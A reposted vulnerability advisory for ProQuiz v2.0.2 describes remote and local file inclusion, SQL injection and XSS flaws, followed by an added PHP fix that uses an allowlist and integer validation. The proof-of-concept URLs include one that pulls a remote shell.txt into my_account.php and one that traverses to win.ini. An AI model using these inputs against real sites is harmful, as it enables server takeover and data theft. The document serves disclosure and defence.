Source: 自学PHP网 Date: 2015-04-17 13:03
Title: ProQuiz v2.0.2 - Multiple Vulnerabilities
Author: L0n3ly-H34rT http://www.2cto.com/ l0n3ly_h34rt@hotmail.com
Vendor site: http://proquiz.softon.org/
Download: http://code.google.com/p/proquiz/downloads/list
Tested on: Linux/Windows

1 - Remote File Inclusion:

* In file (my_account.php), lines 114 & 115:

    if($_GET['action']=='getpage' && !empty($_GET['page'])){
        @include_once($_GET['page'].'.php');

* P.O.C:

First register and log in to your panel, then paste this URL, e.g.:

http://www.2cto.com/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

* Note: requires allow_url_include=On

-----------------------------------------------------------------------

2 - Local File Inclusion:

* In file (my_account.php), lines 114 & 115:

    if($_GET['action']=='getpage' && !empty($_GET['page'])){
        @include_once($_GET['page'].'.php');

* P.O.C:

First register and log in to your panel, then paste this URL, e.g.:

http://www.2cto.com/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg

* Note: also requires magic_quotes_gpc = Off

-----------------------------------------------------------------------

3 - Remote SQL Injection & Blind SQL Injection

* In two files:

A- First (answers.php), line 55:

    <?php echo $_GET['instid']; ?>

B- Second (functions.php), in:

    $_POST['email']
    $_POST['username']

* P.O.C:

A- First:

http://www.2cto.com/full/answers.php?action=answers&instid=[SQL]

B- Second:

About email:
In URL: http://127.0.0.1/full/functions.php?action=recoverpass
Inject here via the POST method: email=[SQL]

About username:
In URL: http://127.0.0.1/full/functions.php?action=edit_profile&type=username
Inject here via the POST method: username=[SQL]

-----------------------------------------------------------------------

4 - Cross Site Scripting:

e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------

# Greetz to my friendz
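
Added example, not part of the original advisory and not ProQuiz code: a hardened form of the my_account.php include from items 1 and 2, plus strict parsing of the instid parameter from items 3 and 4. The page names, the pages directory and both function names are assumptions made for illustration.

```php
<?php
// Added example, not ProQuiz code. Page names and the pages directory are
// assumptions for illustration.

// Fixed allowlist: request value => file name. User input is only ever a
// lookup key, so URL wrappers, "../" and NUL bytes never reach include.
const ACCOUNT_PAGES = [
    'profile'  => 'profile.php',
    'settings' => 'settings.php',
];

function resolve_account_page(array $query, string $baseDir): ?string
{
    $page = $query['page'] ?? '';
    if (($query['action'] ?? '') !== 'getpage' || !is_string($page)
        || !array_key_exists($page, ACCOUNT_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ACCOUNT_PAGES[$page]);
    // Defence in depth: the resolved file must exist inside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// instid is echoed by answers.php and reported as injectable: accept only a
// positive integer, which is safe to print and to bind as a query parameter.
function parse_instid(array $query): ?int
{
    $id = filter_var($query['instid'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return is_int($id) ? $id : null;
}

// Constructed demo: temporary pages directory and sample requests.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pq_pages_demo';
@mkdir($base);
touch($base . DIRECTORY_SEPARATOR . 'profile.php');
$samples = [
    ['action' => 'getpage', 'page' => 'profile'],                      // accepted
    ['action' => 'getpage', 'page' => 'http://127.0.0.1/shell.txt?'],  // rejected
    ['action' => 'getpage', 'page' => "../../windows/win.ini\0.jpg"],  // rejected
    ['action' => 'getpage', 'page' => ['profile']],                    // rejected
];
foreach ($samples as $q) { var_dump(resolve_account_page($q, $base)); }
var_dump(parse_instid(['instid' => '42']), parse_instid(['instid' => '42abc']));
```

Because the request value is only a key into a fixed table, the fix does not depend on allow_url_include or magic_quotes_gpc being set a particular way.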